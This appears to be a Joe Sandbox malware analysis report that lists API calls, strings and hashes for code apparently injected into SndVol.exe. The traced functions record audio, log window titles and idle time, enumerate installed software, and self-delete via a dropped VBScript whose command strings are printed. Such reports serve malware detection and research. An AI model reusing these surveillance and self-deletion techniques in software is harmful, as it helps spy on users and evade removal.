                                                                                                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,02993EE8,00000000), ref: 0293A2FF
                                                                                                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0293A340
                                                                                                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0293A358
                                                                                                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0293A36D
                                                                                                                        • SetEvent.KERNEL32 ref: 0293A38A
                                                                                                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0293A39B
                                                                                                                        • CloseHandle.KERNEL32 ref: 0293A3AB
                                                                                                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0293A3CD
                                                                                                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0293A3D7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                                                        • API String ID: 738084811-1354618412
                                                                                                                        • Opcode ID: bb0a3477d2aaa0912b35127f35aace38b69c747cf2fb4b41844a0dec8ce5b756
                                                                                                                        • Instruction ID: 53a998ca49234799584622819d9a0a098e90cc58ff5c6faacddfbd5281572eb5
                                                                                                                        • Opcode Fuzzy Hash: bb0a3477d2aaa0912b35127f35aace38b69c747cf2fb4b41844a0dec8ce5b756
                                                                                                                        • Instruction Fuzzy Hash: 9251F171A883046FE715FB24DC91EBF7B9EEBC0368F04082DF09A92195DE604D1D8A62
                                                                                                                        Function 02921BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 02921C54
                                                                                                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 02921C7E
                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 02921C8E
                                                                                                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 02921C9E
                                                                                                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 02921CAE
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 02921CBE
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 02921CCF
                                                                                                                        • WriteFile.KERNEL32(00000000,02991B02,00000002,00000000,00000000), ref: 02921CE0
                                                                                                                        • WriteFile.KERNEL32(00000000,02991B04,00000004,00000000,00000000), ref: 02921CF0
                                                                                                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 02921D00
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 02921D11
                                                                                                                        • WriteFile.KERNEL32(00000000,02991B0E,00000002,00000000,00000000), ref: 02921D22
                                                                                                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 02921D32
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 02921D42
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Write$Create
                                                                                                                        • String ID: RIFF$WAVE$data$fmt
                                                                                                                        • API String ID: 1602526932-4212202414
                                                                                                                        • Opcode ID: 20cfede1c3807e857c93c6e89e730fc35e43cae3ba62e4a1e455f18df1c4a961
                                                                                                                        • Instruction ID: 6996e62901fe9ce0b36f3f517888e87d87c399a2fc6960d68ba186832762a599
                                                                                                                        • Opcode Fuzzy Hash: 20cfede1c3807e857c93c6e89e730fc35e43cae3ba62e4a1e455f18df1c4a961
                                                                                                                        • Instruction Fuzzy Hash: 5D4180726443197AE210DE55DD86FBBBFECEB85B50F41081AF644D6080E7A4E909CBB3
                                                                                                                        Function 029264E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\SysWOW64\SndVol.exe,00000001,029268B2,C:\Windows\SysWOW64\SndVol.exe,00000003,029268DA,029942E0,02926933), ref: 029264F4
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 029264FD
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0292650E
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02926511
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 02926522
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02926525
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 02926536
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02926539
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0292654A
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0292654D
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0292655E
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02926561
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: C:\Windows\SysWOW64\SndVol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                        • API String ID: 1646373207-2877372328
                                                                                                                        • Opcode ID: 96e15d4a920eddfdc7f7d5fb7b2d9b9d8183db1e644665b1b4f16092261326c6
                                                                                                                        • Instruction ID: 21e5b02eb894ffecfe10d11f1096f66c0853a0d91e7443b9c1f8dfc3253def5e
                                                                                                                        • Opcode Fuzzy Hash: 96e15d4a920eddfdc7f7d5fb7b2d9b9d8183db1e644665b1b4f16092261326c6
                                                                                                                        • Instruction Fuzzy Hash: 0C011EB4E8432765EB22777E5C54C2BAFEDAE941A430A0826A506D359DEF74C018CD74
                                                                                                                        Function 0293B1BB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?), ref: 0293B1D6
                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 0293B1EE
                                                                                                                        • lstrlenW.KERNEL32(?), ref: 0293B207
                                                                                                                        • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0293B242
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0293B255
                                                                                                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0293B299
                                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 0293B2B4
                                                                                                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0293B2CC
                                                                                                                        • _wcslen.LIBCMT ref: 0293B2DB
                                                                                                                        • FindVolumeClose.KERNEL32(?), ref: 0293B2FB
                                                                                                                        • GetLastError.KERNEL32 ref: 0293B313
                                                                                                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0293B340
                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 0293B359
                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 0293B368
                                                                                                                        • GetLastError.KERNEL32 ref: 0293B370
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                        • String ID: ?
                                                                                                                        • API String ID: 3941738427-1684325040
                                                                                                                        • Opcode ID: 6e697c80eeb9d31d6eaba3cc77584c8ce47360bf2da81c68a8600af5f8689503
                                                                                                                        • Instruction ID: 57ae3b35c546b252aa0a3b165950b7cfb01f708d90bc63d77b4da2fdede1b4b1
                                                                                                                        • Opcode Fuzzy Hash: 6e697c80eeb9d31d6eaba3cc77584c8ce47360bf2da81c68a8600af5f8689503
                                                                                                                        • Instruction Fuzzy Hash: A0417071948315ABD721DFA1D888AEFB7ECFB99718F400D2AF541C2160EB70C558CB92
                                                                                                                        Function 0296E20E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3899193279-0
                                                                                                                        • Opcode ID: 42d8d54fdcb88d702f95cb997a4154ac65d4279fad0249fa8b65ee6de2a67905
                                                                                                                        • Instruction ID: ea7460ebd539abd3b55b54685cbb1426d25ea0d028e7557da39106c1182f0efa
                                                                                                                        • Opcode Fuzzy Hash: 42d8d54fdcb88d702f95cb997a4154ac65d4279fad0249fa8b65ee6de2a67905
                                                                                                                        • Instruction Fuzzy Hash: 76D15979D04301AFDF25AF788888E7E7BEDAF45360F09456DE98997280E7328640CF91
                                                                                                                        Function 02933E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 02933E86
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 02933EC8
                                                                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02933EE8
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 02933EEF
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 02933F27
                                                                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02933F39
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 02933F40
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 02933F4F
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 02933F66
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                        • API String ID: 2490988753-744132762
                                                                                                                        • Opcode ID: b7fa16f496e0966d1c23550295f0ff19147f2d0113f3d8c20cbbd95c8c92b0d7
                                                                                                                        • Instruction ID: 2bf08f63fadaa2bb3c86ebeb537944fa48ad605c7cbea93a7995eadeb560a530
                                                                                                                        • Opcode Fuzzy Hash: b7fa16f496e0966d1c23550295f0ff19147f2d0113f3d8c20cbbd95c8c92b0d7
                                                                                                                        • Instruction Fuzzy Hash: B1312C71945315ABE322EB64DD48E9FB7ECEF84758F450A68F844D3100D734C9048BEA
                                                                                                                        Function 0293B824 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0293B846
                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0293B88A
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0293BB54
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                        • API String ID: 1332880857-3714951968
                                                                                                                        • Opcode ID: cf875154c78aa82dfb7ebe18e79e1a8ed71609db986d2ae6affda8c31fef5d3a
                                                                                                                        • Instruction ID: 6f61bf602d09a195580c134edc1ea67e2cb77acfbdc72deda7bdac190c2f6e39
                                                                                                                        • Opcode Fuzzy Hash: cf875154c78aa82dfb7ebe18e79e1a8ed71609db986d2ae6affda8c31fef5d3a
                                                                                                                        • Instruction Fuzzy Hash: 24812D311083559BD729EB10DC60EEFB7EAAFD4314F40482EA58A82195EF70AA5DCE52
                                                                                                                        Function 0293CA9E Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0293CAE9
                                                                                                                        • GetCursorPos.USER32(?), ref: 0293CAF8
                                                                                                                        • SetForegroundWindow.USER32(?), ref: 0293CB01
                                                                                                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0293CB1B
                                                                                                                        • Shell_NotifyIconA.SHELL32(00000002,02993B50), ref: 0293CB6C
                                                                                                                        • ExitProcess.KERNEL32 ref: 0293CB74
                                                                                                                        • CreatePopupMenu.USER32 ref: 0293CB7A
                                                                                                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0293CB8F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                        • String ID: Close
                                                                                                                        • API String ID: 1657328048-3535843008
                                                                                                                        • Opcode ID: 5b5e0595b052fae971ccda46cdeb2a29a1bab259cd8514bf16f34b8fb18a1a57
                                                                                                                        • Instruction ID: 7f721e1511d2c29a03d48f2ed6b13b09c5ed643ebe86c446e93bc870c8eed65b
                                                                                                                        • Opcode Fuzzy Hash: 5b5e0595b052fae971ccda46cdeb2a29a1bab259cd8514bf16f34b8fb18a1a57
                                                                                                                        • Instruction Fuzzy Hash: 7F212F31988205FFEB065FA4ED0DEF97F79EB04701F044959F906A40A0D7B59934DB14
                                                                                                                        Function 0297006D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 029700B1
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F300
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F312
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F324
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F336
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F348
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F35A
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F36C
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F37E
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F390
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F3A2
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F3B4
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F3C6
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F3D8
                                                                                                                        • _free.LIBCMT ref: 029700A6
                                                                                                                          • Part of subcall function 02966AC5: HeapFree.KERNEL32(00000000,00000000,?,0296FA50,00000000,00000000,00000000,00000000,?,0296FCF4,00000000,00000007,00000000,?,02970205,00000000), ref: 02966ADB
                                                                                                                          • Part of subcall function 02966AC5: GetLastError.KERNEL32(00000000,?,0296FA50,00000000,00000000,00000000,00000000,?,0296FCF4,00000000,00000007,00000000,?,02970205,00000000,00000000), ref: 02966AED
                                                                                                                        • _free.LIBCMT ref: 029700C8
                                                                                                                        • _free.LIBCMT ref: 029700DD
                                                                                                                        • _free.LIBCMT ref: 029700E8
                                                                                                                        • _free.LIBCMT ref: 0297010A
                                                                                                                        • _free.LIBCMT ref: 0297011D
                                                                                                                        • _free.LIBCMT ref: 0297012B
                                                                                                                        • _free.LIBCMT ref: 02970136
                                                                                                                        • _free.LIBCMT ref: 0297016E
                                                                                                                        • _free.LIBCMT ref: 02970175
                                                                                                                        • _free.LIBCMT ref: 02970192
                                                                                                                        • _free.LIBCMT ref: 029701AA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 161543041-0
                                                                                                                        • Opcode ID: c88da5a669ea8e65cfe4fbfbff65fae31cf4d0975901aab21e9a7947cbc57b53
                                                                                                                        • Instruction ID: 70f210fa5d40fe4222eb2a9420bf9f4ef44b8f7f81b395bc3513ffa748667258
                                                                                                                        • Opcode Fuzzy Hash: c88da5a669ea8e65cfe4fbfbff65fae31cf4d0975901aab21e9a7947cbc57b53
                                                                                                                        • Instruction Fuzzy Hash: D3312C31600705AFEB21AE39D848B6AB7FEAF80364F548419E459D7191EF36A994CF20
                                                                                                                        Function 0296F3E1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: f37b5909f37a309916bcb53d930ff984d5a942188d65486073c6355e618d88ce
                                                                                                                        • Instruction ID: 2be3083dde772e75848c342fe623328e7b83c8714585b5dfbc926d4b226f117e
                                                                                                                        • Opcode Fuzzy Hash: f37b5909f37a309916bcb53d930ff984d5a942188d65486073c6355e618d88ce
                                                                                                                        • Instruction Fuzzy Hash: 5EC124B2D40209AFDB20DBA8DC46FEE77FDAB48700F144165FA09FB681D6709A419F64
                                                                                                                        Function 02974982 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02974650: CreateFileW.KERNEL32(00000000,00000000,?,02974A2B,?,?,00000000,?,02974A2B,00000000,0000000C), ref: 0297466D
                                                                                                                        • GetLastError.KERNEL32 ref: 02974A96
                                                                                                                        • __dosmaperr.LIBCMT ref: 02974A9D
                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 02974AA9
                                                                                                                        • GetLastError.KERNEL32 ref: 02974AB3
                                                                                                                        • __dosmaperr.LIBCMT ref: 02974ABC
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02974ADC
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 02974C26
                                                                                                                        • GetLastError.KERNEL32 ref: 02974C58
                                                                                                                        • __dosmaperr.LIBCMT ref: 02974C5F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                        • String ID: H
                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                        • Opcode ID: 7d72f8aacbbacd778110a2108106750589a6948146f61969789506f7fd456e49
                                                                                                                        • Instruction ID: aaed67cbf902021428ad9ce7236b0a9c61df74912819e4a70a548139b1cf7f5f
                                                                                                                        • Opcode Fuzzy Hash: 7d72f8aacbbacd778110a2108106750589a6948146f61969789506f7fd456e49
                                                                                                                        • Instruction Fuzzy Hash: D5A13432A041458FCF19DF78D885BBE7BB5EB4A320F181159E815EB392DB318812CB55
                                                                                                                        Function 0292A3F4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 158sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0292A456
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 0292A461
                                                                                                                        • GetForegroundWindow.USER32 ref: 0292A467
                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 0292A470
                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0292A4A4
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 0292A574
                                                                                                                          • Part of subcall function 02929D58: SetEvent.KERNEL32(?,?,00000000,0292A91C,00000000), ref: 02929D84
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                        • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                        • API String ID: 911427763-3954389425
                                                                                                                        • Opcode ID: fddf8c950492ad214c0daeaec4de48cc9bf283e27eabee9ca3e8ecd41831d9be
                                                                                                                        • Instruction ID: c6d1946e4be3b980aca219754e67d0c6956f6828c604f7d5d285b9355492bc81
                                                                                                                        • Opcode Fuzzy Hash: fddf8c950492ad214c0daeaec4de48cc9bf283e27eabee9ca3e8ecd41831d9be
                                                                                                                        • Instruction Fuzzy Hash: 985113726083205BD719FB24D854A7FB7DAAFC4324F80092CF84A861D8DF609E4DCB92
                                                                                                                        Function 0292C66D Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 147COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02931699: TerminateProcess.KERNEL32(00000000,pth_unenc,0292E670), ref: 029316A9
                                                                                                                          • Part of subcall function 02931699: WaitForSingleObject.KERNEL32(000000FF), ref: 029316BC
                                                                                                                          • Part of subcall function 0293265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,029942F8), ref: 02932679
                                                                                                                          • Part of subcall function 0293265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 02932692
                                                                                                                          • Part of subcall function 0293265D: RegCloseKey.ADVAPI32(00000000), ref: 0293269D
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0292C6C7
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,02985900,02985900,00000000), ref: 0292C826
                                                                                                                        • ExitProcess.KERNEL32 ref: 0292C832
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                        • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                        • API String ID: 1913171305-2411266221
                                                                                                                        • Opcode ID: e2eb314d868eb419cfed8c95b07a3179a220abf034a34d55282b6808568251cf
                                                                                                                        • Instruction ID: a8db4891c9e56a5befec2d34356d02a9372eaeedc70d5d4bfc32ac401d5256fe
                                                                                                                        • Opcode Fuzzy Hash: e2eb314d868eb419cfed8c95b07a3179a220abf034a34d55282b6808568251cf
                                                                                                                        • Instruction Fuzzy Hash: 13414F32D001285ADB19F7A0DC55DFFB77AAFE1710F40016AE40AA7099EF606E5ECE94
                                                                                                                        Function 02959361 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02921AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 029593B9
                                                                                                                        • GetLastError.KERNEL32(?,?,02921AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 029593C6
                                                                                                                        • __dosmaperr.LIBCMT ref: 029593CD
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02921AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 029593F9
                                                                                                                        • GetLastError.KERNEL32(?,?,?,02921AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02959403
                                                                                                                        • __dosmaperr.LIBCMT ref: 0295940A
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,02921AD8,?), ref: 0295944D
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,02921AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02959457
